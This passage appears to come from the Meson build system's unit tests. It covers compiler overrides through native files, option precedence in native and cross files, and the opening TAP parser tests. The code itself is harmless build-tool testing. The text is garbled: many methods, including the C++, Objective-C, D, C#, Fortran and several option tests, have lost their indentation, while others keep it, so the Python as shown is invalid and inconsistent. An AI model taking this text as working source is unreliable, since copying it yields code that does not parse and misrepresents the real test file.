        raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
    if not shutil.which('llvm-config'):
        raise unittest.SkipTest('No llvm-installed, cannot test')
    self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
    # The python3 module must honor a native-file 'python3' override.
    self._simple_test('python3', 'python3')
def test_python_module(self):
    if is_windows():
        # Bat adds extra crap to stdout, so the version check logic in the
        # python module breaks. This is fine on other OSes because they
        # don't need the extra indirection.
        raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
    elif is_osx():
        binary = 'python'
    else:
        binary = 'python2'

        # The test machine may not have python2 dev packages; probe for
        # them via pkg-config under the names various distros use.
        for v in ['2', '2.7', '-2.7']:
            rc = subprocess.call(['pkg-config', '--cflags', f'python{v}'],
                                 stdout=subprocess.DEVNULL,
                                 stderr=subprocess.DEVNULL)
            if rc == 0:
                break
        else:
            raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
    self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
    def cb(comp):
        # Override with the "other" compiler family: gcc -> clang and
        # vice versa; skip if only one real compiler is present.
        if comp.id == 'gcc':
            if not shutil.which('clang'):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'clang', 'clang'
        if not is_real_gnu_compiler(shutil.which('gcc')):
            raise unittest.SkipTest('Only one compiler found, cannot test.')
        return 'gcc', 'gcc'
    self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
    def _single_implementation_compiler(self, lang: str, binary: str, version_str: str, version: str) -> None:
        """Helper for languages with a single (supported) implementation.
        Builds a wrapper around the compiler to override the version.

        lang: meson language name (e.g. 'vala')
        binary: real compiler binary to wrap
        version_str: raw version text the wrapper prints
        version: version meson is expected to parse out of version_str
        """
        wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
        env = get_fake_env()
        getter = getattr(env, f'detect_{lang}_compiler')
        getter = functools.partial(getter, MachineChoice.HOST)
        # Point the host machine's binary table at the wrapper, then detect.
        env.binaries.host.binaries[lang] = [wrapper]
        compiler = getter()
        self.assertEqual(compiler.version, version)
    @skip_if_not_language('vala')
    @skip_if_env_set('VALAC')
    def test_vala_compiler(self):
        self._single_implementation_compiler(
            'vala', 'valac', 'Vala 1.2345', '1.2345')
    @skip_if_not_language('rust')
    @skip_if_env_set('RUSTC')
    def test_rust_compiler(self):
        self._single_implementation_compiler(
            'rust', 'rustc', 'rustc 1.2345', '1.2345')
    @skip_if_not_language('java')
    def test_java_compiler(self):
        self._single_implementation_compiler(
            'java', 'javac', 'javac 9.99.77', '9.99.77')
    @skip_if_not_language('swift')
    def test_swift_compiler(self):
        # swiftc reports its version on stderr and needs extra linker noise
        # faked for the detection logic, so it can't use the shared helper.
        wrapper = self.helper_create_binary_wrapper(
            'swiftc', version='Swift 1.2345', outfile='stderr',
            extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
        env = get_fake_env()
        env.binaries.host.binaries['swift'] = [wrapper]
        compiler = env.detect_swift_compiler(MachineChoice.HOST)
        self.assertEqual(compiler.version, '1.2345')
    def test_native_file_dirs(self):
        # Directory options from the native file alone must configure cleanly.
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
    def test_native_file_dirs_overridden(self):
        # Command-line -D values must override the native file's directories.
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
                              '-Ddef_libdir=liblib', '-Dlibdir=liblib'])
    def test_compile_sys_path(self):
        """Compiling with a native file stored in a system path works.
        There was a bug which caused the paths to be stored incorrectly and
        would result in ninja invoking meson in an infinite loop. This tests
        for that by actually invoking ninja.
        """
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        # It really doesn't matter what's in the native file, just that it exists
        config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
        self.init(testcase, extra_args=['--native-file', config])
        self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '40 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0),
('CaseSenSiTivE', 'SOME other Value'),
('CASESENSITIVE', 'some other Value')]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
    def test_user_options_command_line_overrides(self):
        # A -D option on the command line must beat the native-file value;
        # configuring successfully is the assertion here.
        testcase = os.path.join(self.common_test_dir, '40 options')
        config = self.helper_create_native_file({'project options': {'other_one': True}})
        self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '40 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
    def test_option_bool(self):
        # Bools are allowed to be unquoted
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        config = self.helper_create_native_file({'built-in options': {'werror': True}})
        self.init(testcase, extra_args=['--native-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            # Test that non-per-subproject options are inherited from the parent
            if 'werror' in each['name']:
                self.assertEqual(each['value'], True)
                break
        else:
            self.fail('Did not find werror in build options?')
    def test_option_integer(self):
        # Integers are allowed to be unquoted
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
        self.init(testcase, extra_args=['--native-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            # Test that non-per-subproject options are inherited from the parent
            if 'unity_size' in each['name']:
                self.assertEqual(each['value'], 100)
                break
        else:
            self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find werror in build options?')
    def test_builtin_options_conf_overrides_env(self):
        # A native-file value must beat the corresponding environment variable.
        testcase = os.path.join(self.common_test_dir, '2 cpp')
        config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
        self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'pkg_config_path':
                self.assertEqual(each['value'], ['/foo'])
                break
        else:
            self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '98 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all three sections')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '223 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises((RuntimeError, subprocess.CalledProcessError)) as cm:
self.init(testcase, extra_args=['--native-file', config])
if isinstance(cm, RuntimeError):
check = str(cm.exception)
else:
check = cm.exception.stdout
self.assertIn(check, 'Parent should override default_library')
    def test_builtin_options_subprojects_dont_inherits_parent_override(self):
        # If the buildfile says subproject(... default_library: shared), ensure that's overwritten
        testcase = os.path.join(self.common_test_dir, '223 persubproject options')
        config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
        # Configuring successfully is the assertion: the subproject's own
        # per-project setting must not be clobbered by the parent override.
        self.init(testcase, extra_args=['--native-file', config])
    def test_builtin_options_compiler_properties(self):
        # the properties section can have lang_args, and those need to be
        # overwritten by the built-in options
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        config = self.helper_create_native_file({
            'built-in options': {'c_args': ['-DFOO']},
            'properties': {'c_args': ['-DBAR']},
        })
        self.init(testcase, extra_args=['--native-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'c_args':
                self.assertEqual(each['value'], ['-DFOO'])
                break
        else:
            self.fail('Did not find c_args in build options?')
    def test_builtin_options_compiler_properties_legacy(self):
        # The legacy placement in properties is still valid if a 'built-in
        # options' setting is present, but doesn't have the lang_args
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        config = self.helper_create_native_file({
            'built-in options': {'default_library': 'static'},
            'properties': {'c_args': ['-DBAR']},
        })
        self.init(testcase, extra_args=['--native-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'c_args':
                # The legacy properties value wins when no built-in c_args is set.
                self.assertEqual(each['value'], ['-DBAR'])
                break
        else:
            self.fail('Did not find c_args in build options?')
    def test_builtin_options_paths(self):
        # the legacy 'paths' section can set directory options, and those
        # need to be overwritten by the 'built-in options' section
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        config = self.helper_create_native_file({
            'built-in options': {'bindir': 'foo'},
            'paths': {'bindir': 'bar'},
        })
        self.init(testcase, extra_args=['--native-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'bindir':
                self.assertEqual(each['value'], 'foo')
                break
        else:
            self.fail('Did not find bindir in build options?')
    def test_builtin_options_paths_legacy(self):
        # The legacy 'paths' value still applies when 'built-in options'
        # doesn't set the same directory option.
        testcase = os.path.join(self.common_test_dir, '1 trivial')
        config = self.helper_create_native_file({
            'built-in options': {'default_library': 'static'},
            'paths': {'bindir': 'bar'},
        })
        self.init(testcase, extra_args=['--native-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'bindir':
                self.assertEqual(each['value'], 'bar')
                break
        else:
            self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
    """Tests for cross file functionality not directly related to
    cross compiling.
    This is mainly aimed to testing overrides from cross files.
    """
    def setUp(self):
        super().setUp()
        # Counters used to generate unique temporary file names per test.
        self.current_config = 0
        self.current_wrapper = 0
    def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
                              exe_wrapper: T.Optional[T.List[str]] = None) -> str:
        """Return the text of a minimal cross file targeting 32-bit linux."""
        if is_windows():
            raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
        return textwrap.dedent(f"""\
            [binaries]
            c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
            ar = '{shutil.which('ar')}'
            strip = '{shutil.which('strip')}'
            exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'}
            [properties]
            needs_exe_wrapper = {needs_exe_wrapper}
            [host_machine]
            system = 'linux'
            cpu_family = 'x86'
            cpu = 'i686'
            endian = 'little'
            """)
    def _stub_exe_wrapper(self) -> str:
        """Return a trivial exe wrapper script that just execs its arguments."""
        return textwrap.dedent('''\
            #!/usr/bin/env python3
            import subprocess
            import sys
            sys.exit(subprocess.run(sys.argv[1:]).returncode)
            ''')
    def test_needs_exe_wrapper_true(self):
        # With needs_exe_wrapper=true and no wrapper the exe test is skipped.
        testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
        with tempfile.TemporaryDirectory() as d:
            p = Path(d) / 'crossfile'
            with p.open('wt') as f:
                f.write(self._cross_file_generator(needs_exe_wrapper=True))
            self.init(testdir, extra_args=['--cross-file=' + str(p)])
            out = self.run_target('test')
            self.assertRegex(out, r'Skipped:\s*1\s*\n')
    def test_needs_exe_wrapper_false(self):
        # With needs_exe_wrapper=false the exe test must actually run.
        testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
        with tempfile.TemporaryDirectory() as d:
            p = Path(d) / 'crossfile'
            with p.open('wt') as f:
                f.write(self._cross_file_generator(needs_exe_wrapper=False))
            self.init(testdir, extra_args=['--cross-file=' + str(p)])
            out = self.run_target('test')
            self.assertNotRegex(out, r'Skipped:\s*1\n')
    def test_needs_exe_wrapper_true_wrapper(self):
        # When a wrapper is provided, all tests run through it (nothing skipped).
        testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
        with tempfile.TemporaryDirectory() as d:
            s = Path(d) / 'wrapper.py'
            with s.open('wt') as f:
                f.write(self._stub_exe_wrapper())
            s.chmod(0o774)
            p = Path(d) / 'crossfile'
            with p.open('wt') as f:
                f.write(self._cross_file_generator(
                    needs_exe_wrapper=True,
                    exe_wrapper=[str(s)]))
            self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
            out = self.run_target('test')
            self.assertRegex(out, r'Ok:\s*3\s*\n')
    def test_cross_exe_passed_no_wrapper(self):
        # Building works without a wrapper; only running the exe is skipped.
        testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
        with tempfile.TemporaryDirectory() as d:
            p = Path(d) / 'crossfile'
            with p.open('wt') as f:
                f.write(self._cross_file_generator(needs_exe_wrapper=True))
            self.init(testdir, extra_args=['--cross-file=' + str(p)])
            self.build()
            out = self.run_target('test')
            self.assertRegex(out, r'Skipped:\s*1\s*\n')
    # The test uses mocking and thus requires that the current process is the
    # one to run the Meson steps. If we are using an external test executable
    # (most commonly in Debian autopkgtests) then the mocking won't work.
    @unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
    def test_cross_file_system_paths(self):
        if is_windows():
            raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        cross_content = self._cross_file_generator()
        # Cross files are looked up by bare name under XDG_DATA_HOME and
        # XDG_DATA_DIRS; exercise both.
        with tempfile.TemporaryDirectory() as d:
            dir_ = os.path.join(d, 'meson', 'cross')
            os.makedirs(dir_)
            with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
                f.write(cross_content)
            name = os.path.basename(f.name)
            with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
                self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
                self.wipe()
            with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
                os.environ.pop('XDG_DATA_HOME', None)
                self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
                self.wipe()
        with tempfile.TemporaryDirectory() as d:
            dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
            os.makedirs(dir_)
            with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
                f.write(cross_content)
            name = os.path.basename(f.name)
            # If XDG_DATA_HOME is set in the environment running the
            # tests this test will fail, so mock the environment, pop
            # it, then test
            with mock.patch.dict(os.environ):
                os.environ.pop('XDG_DATA_HOME', None)
                with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
                    self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
                    self.wipe()
    def helper_create_cross_file(self, values):
        """Create a config file as a temporary file.
        values should be a nested dictionary structure of {section: {key:
        value}}
        """
        filename = os.path.join(self.builddir, f'generated{self.current_config}.config')
        self.current_config += 1
        with open(filename, 'wt') as f:
            for section, entries in values.items():
                f.write(f'[{section}]\n')
                for k, v in entries.items():
                    f.write(f"{k}={v!r}\n")
        return filename
    def test_cross_file_dirs(self):
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
                              '--cross-file', os.path.join(testcase, 'crossfile'),
                              '-Ddef_bindir=binbar',
                              '-Ddef_datadir=databar',
                              '-Ddef_includedir=includebar',
                              '-Ddef_infodir=infobar',
                              '-Ddef_libdir=libbar',
                              '-Ddef_libexecdir=libexecbar',
                              '-Ddef_localedir=localebar',
                              '-Ddef_localstatedir=localstatebar',
                              '-Ddef_mandir=manbar',
                              '-Ddef_sbindir=sbinbar',
                              '-Ddef_sharedstatedir=sharedstatebar',
                              '-Ddef_sysconfdir=sysconfbar'])
    def test_cross_file_dirs_overridden(self):
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
                              '--cross-file', os.path.join(testcase, 'crossfile'),
                              '-Ddef_libdir=liblib', '-Dlibdir=liblib',
                              '-Ddef_bindir=binbar',
                              '-Ddef_datadir=databar',
                              '-Ddef_includedir=includebar',
                              '-Ddef_infodir=infobar',
                              '-Ddef_libexecdir=libexecbar',
                              '-Ddef_localedir=localebar',
                              '-Ddef_localstatedir=localstatebar',
                              '-Ddef_mandir=manbar',
                              '-Ddef_sbindir=sbinbar',
                              '-Ddef_sharedstatedir=sharedstatebar',
                              '-Ddef_sysconfdir=sysconfbar'])
    def test_cross_file_dirs_chain(self):
        # crossfile2 overrides crossfile overrides nativefile
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
                              '--cross-file', os.path.join(testcase, 'crossfile'),
                              '--cross-file', os.path.join(testcase, 'crossfile2'),
                              '-Ddef_bindir=binbar2',
                              '-Ddef_datadir=databar',
                              '-Ddef_includedir=includebar',
                              '-Ddef_infodir=infobar',
                              '-Ddef_libdir=libbar',
                              '-Ddef_libexecdir=libexecbar',
                              '-Ddef_localedir=localebar',
                              '-Ddef_localstatedir=localstatebar',
                              '-Ddef_mandir=manbar',
                              '-Ddef_sbindir=sbinbar',
                              '-Ddef_sharedstatedir=sharedstatebar',
                              '-Ddef_sysconfdir=sysconfbar'])
    def test_user_options(self):
        # This is just a touch test for cross file, since the implementation
        # shares code after loading from the files
        testcase = os.path.join(self.common_test_dir, '40 options')
        config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self.init(testcase, extra_args=['--cross-file', config])
        # FIX: this assertion must run *after* the with block — self.init()
        # raises, so a statement after it inside the block would never run.
        self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
    def test_builtin_options(self):
        testcase = os.path.join(self.common_test_dir, '2 cpp')
        config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
        self.init(testcase, extra_args=['--cross-file', config])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'cpp_std':
                self.assertEqual(each['value'], 'c++14')
                break
        else:
            self.fail('No c++ standard set?')
    def test_builtin_options_per_machine(self):
        """Test options that are allowed to be set on a per-machine basis.
        Such options could be passed twice, once for the build machine, and
        once for the host machine. I've picked pkg-config path, but any would
        do that can be set for both.
        """
        testcase = os.path.join(self.common_test_dir, '2 cpp')
        cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
        native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
        # Ensure that PKG_CONFIG_PATH is not set in the environment
        with mock.patch.dict('os.environ'):
            for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
                try:
                    del os.environ[k]
                except KeyError:
                    pass
            self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
        configuration = self.introspect('--buildoptions')
        found = 0
        for each in configuration:
            if each['name'] == 'pkg_config_path':
                self.assertEqual(each['value'], ['/cross/path'])
                found += 1
            elif each['name'] == 'cpp_std':
                self.assertEqual(each['value'], 'c++17')
                found += 1
            elif each['name'] == 'build.pkg_config_path':
                self.assertEqual(each['value'], ['/native/path'])
                found += 1
            elif each['name'] == 'build.cpp_std':
                self.assertEqual(each['value'], 'c++14')
                found += 1
            if found == 4:
                break
        self.assertEqual(found, 4, 'Did not find all sections.')
    def test_builtin_options_conf_overrides_env(self):
        # Machine-file values beat environment variables for both machines.
        testcase = os.path.join(self.common_test_dir, '2 cpp')
        config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native', 'cpp_args': '-DFILE'}})
        cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross', 'cpp_args': '-DFILE'}})
        self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
                  override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir',
                                    'CXXFLAGS': '-DENV', 'CXXFLAGS_FOR_BUILD': '-DENV'})
        configuration = self.introspect('--buildoptions')
        found = 0
        expected = 4
        for each in configuration:
            if each['name'] == 'pkg_config_path':
                self.assertEqual(each['value'], ['/cross'])
                found += 1
            elif each['name'] == 'build.pkg_config_path':
                self.assertEqual(each['value'], ['/native'])
                found += 1
            elif each['name'].endswith('cpp_args'):
                self.assertEqual(each['value'], ['-DFILE'])
                found += 1
            if found == expected:
                break
        self.assertEqual(found, expected, 'Did not find all sections.')
    def test_for_build_env_vars(self) -> None:
        # With empty machine files, *_FOR_BUILD env vars feed the build
        # machine and the plain ones feed the host machine.
        testcase = os.path.join(self.common_test_dir, '2 cpp')
        config = self.helper_create_cross_file({'built-in options': {}})
        cross = self.helper_create_cross_file({'built-in options': {}})
        self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
                  override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
        configuration = self.introspect('--buildoptions')
        found = 0
        for each in configuration:
            if each['name'] == 'pkg_config_path':
                self.assertEqual(each['value'], ['/bar'])
                found += 1
            elif each['name'] == 'build.pkg_config_path':
                self.assertEqual(each['value'], ['/dir'])
                found += 1
            if found == 2:
                break
        self.assertEqual(found, 2, 'Did not find all sections.')
    def test_project_options_native_only(self) -> None:
        # Do not load project options from a native file when doing a cross
        # build
        testcase = os.path.join(self.unit_test_dir, '19 array option')
        config = self.helper_create_cross_file({'project options': {'list': ['bar', 'foo']}})
        cross = self.helper_create_cross_file({'binaries': {}})
        self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross])
        configuration = self.introspect('--buildoptions')
        for each in configuration:
            if each['name'] == 'list':
                # The project's own default, not the native-file value.
                self.assertEqual(each['value'], ['foo', 'bar'])
                break
        else:
            self.fail('Did not find expected option.')
class TAPParserTests(unittest.TestCase):
    def assert_test(self, events, **kwargs):
        """Assert the next event is a Test with the given fields."""
        if 'explanation' not in kwargs:
            kwargs['explanation'] = None
        self.assertEqual(next(events), TAPParser.Test(**kwargs))
    def assert_plan(self, events, **kwargs):
        """Assert the next event is a Plan with the given fields."""
        if 'skipped' not in kwargs:
            kwargs['skipped'] = False
        if 'explanation' not in kwargs:
            kwargs['explanation'] = None
        self.assertEqual(next(events), TAPParser.Plan(**kwargs))
    def assert_version(self, events, **kwargs):
        """Assert the next event is a Version event."""
        self.assertEqual(next(events), TAPParser.Version(**kwargs))
    def assert_error(self, events):
        """Assert the next event is a parse Error (payload ignored)."""
        self.assertEqual(type(next(events)), TAPParser.Error)
    def assert_bailout(self, events, **kwargs):
        """Assert the next event is a Bailout event."""
        self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
    def assert_last(self, events):
        """Assert the event stream is exhausted."""
        with self.assertRaises(StopIteration):
            next(events)
    def parse_tap(self, s):
        """Parse *s* as TAP and return an iterator of parser events."""
        parser = TAPParser()
        return iter(parser.parse(io.StringIO(s)))
    def parse_tap_v13(self, s):
        """Parse *s* under a 'TAP version 13' header, consuming the Version event."""
        events = self.parse_tap('TAP version 13\n' + s)
        self.assert_version(events, version=13)
        return events
    def test_empty(self):
        # No input yields no events.
        events = self.parse_tap('')
        self.assert_last(events)
    def test_empty_plan(self):
        # A 1..0 plan means the whole stream is skipped.
        events = self.parse_tap('1..0')
        self.assert_plan(events, num_tests=0, late=False, skipped=True)
        self.assert_last(events)
    def test_plan_directive(self):
        events = self.parse_tap('1..0 # skipped for some reason')
        self.assert_plan(events, num_tests=0, late=False, skipped=True,
                         explanation='for some reason')
        self.assert_last(events)
        # A skip directive on a non-empty plan is an error, but still parsed.
        events = self.parse_tap('1..1 # skipped for some reason\nok 1')
        self.assert_error(events)
        self.assert_plan(events, num_tests=1, late=False, skipped=True,
                         explanation='for some reason')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
        # 'todo' is not a valid plan directive; it is flagged but kept.
        events = self.parse_tap('1..1 # todo not supported here\nok 1')
        self.assert_error(events)
        self.assert_plan(events, num_tests=1, late=False, skipped=False,
                         explanation='not supported here')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_ok(self):
        # Bare 'ok' is numbered implicitly starting at 1.
        events = self.parse_tap('ok')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_with_number(self):
        events = self.parse_tap('ok 1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_with_name(self):
        events = self.parse_tap('ok 1 abc')
        self.assert_test(events, number=1, name='abc', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_not_ok(self):
        events = self.parse_tap('not ok')
        self.assert_test(events, number=1, name='', result=TestResult.FAIL)
        self.assert_last(events)
    def test_one_test_todo(self):
        # TODO inverts the meaning: failing is expected, passing is unexpected.
        events = self.parse_tap('not ok 1 abc # TODO')
        self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
        self.assert_last(events)
        events = self.parse_tap('ok 1 abc # TODO')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
        self.assert_last(events)
    def test_one_test_skip(self):
        events = self.parse_tap('ok 1 abc # SKIP')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
        self.assert_last(events)
    def test_one_test_skip_failure(self):
        # A failing test marked SKIP still counts as a failure.
        events = self.parse_tap('not ok 1 abc # SKIP')
        self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
        self.assert_last(events)
    def test_many_early_plan(self):
        # Plan before the tests: late=False.
